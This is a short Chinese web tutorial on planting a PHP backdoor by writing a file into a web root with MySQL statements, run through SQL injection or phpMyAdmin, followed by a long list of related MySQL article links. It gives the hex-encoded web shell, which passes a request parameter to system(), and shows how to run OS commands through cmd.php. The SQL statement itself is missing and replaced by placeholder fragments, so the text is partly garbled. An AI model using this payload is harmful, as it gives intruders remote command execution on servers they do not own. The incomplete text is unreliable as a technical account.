运用Mysql语句生成后门木马的具体方法
通过Mysql 的语句生成后门木马的方法:
|
通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:
|
再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!
问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?
答:就是下图代码中的十六进制编码,
___FCKpd___2 |
如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!
最新相关文章- ·MySQL之表结构修改
- ·用Apache与MySQL整合实现基本身份认证
- ·Linux中Mysql安装备份与密码恢复
- ·安全的配置和应用MySQL数据库
- ·带你轻松接触一个检测MySQL状态的脚本
- ·正确认识MySQL对服务器端光标的限制
- ·利用MySQL加密函数保护Web网站的敏感数据
- ·怎样修改MySQL中遗失的“ROOT“用户密码
- ·MySQL中值得我们注意的几个“SQL“语句
- ·MySQL数据库中的重要数据应当如何保护
- ·带你深入了解MySQL语句优化的基本原则
- ·利用“c3p0“配置数据库连接的实例脚本
- ·详细讲解MySQL数据库对文件操作的封装
- ·细化解析:怎样修改 MySQL数据库中的密码
- ·解析:怎样在MySQL中获得更好的搜索结果
- ·怎样正确的解决 MySQL 中文模糊检索问题
发表评论- mysql优化 my.ini示例
- 解决不能通过mysql.sock连接MySQL问题的办法
- MySQL中文参考手册-- 创造并使用一个数据库
- mysql数据库连接过多的错误,可能的原因分析及解
- MySQL高级特性----对比与其他数据库
- Linux下安PHP,APACHE,MYSQL,PERL方法
- VSFTP+MySQL虚拟用户配置
- MySQL管理员指南之--MySQL用户管理
- Win2000 Apache PHP MySQL 安装及安全手册
- MySQL数据的导出和导入工具mysqldump
- Win2K下配置ASP+CGI+PHP+MySQL全攻略
- Mysql日期和时间函数
- 如何才能使图形化管理MySQL更轻松(一)
- Apache2+php4.3.6+MySQL4.0.20+SSL配置过程
- 利用“c3p0“配置数据库连接的实例脚本
- 解析:怎样在MySQL中获得更好的搜索结果
- 运用Mysql语句生成后门木马的具体方法
- 怎样修改MySQL中遗失的“ROOT“用户密码
- 细化解析:对存储子程序和触发程序的限制
- MySQL 服务无法启动系统发生 1067 错误
- MySQL中文参考手册--- MySQL与标准的兼容性
- MySQL数据库中的重要数据应当如何保护
- 教你轻松掌握MySQL数据库中已压缩表特征
- 如何才能使图形化管理MySQL更轻松(二)
- 解析:MySQL 数据库搜索中大小写敏感性
- 细化解析:怎样来避免表已满的错误出现
- MYSQL数据库实用学习资料之常用命令集合
- 解析:轻松解决无法初始化字符集的问题
- 解决不能通过mysql.sock连接MySQL问题的办法
- 解析:怎样使MySQL在攻击者面前保持安全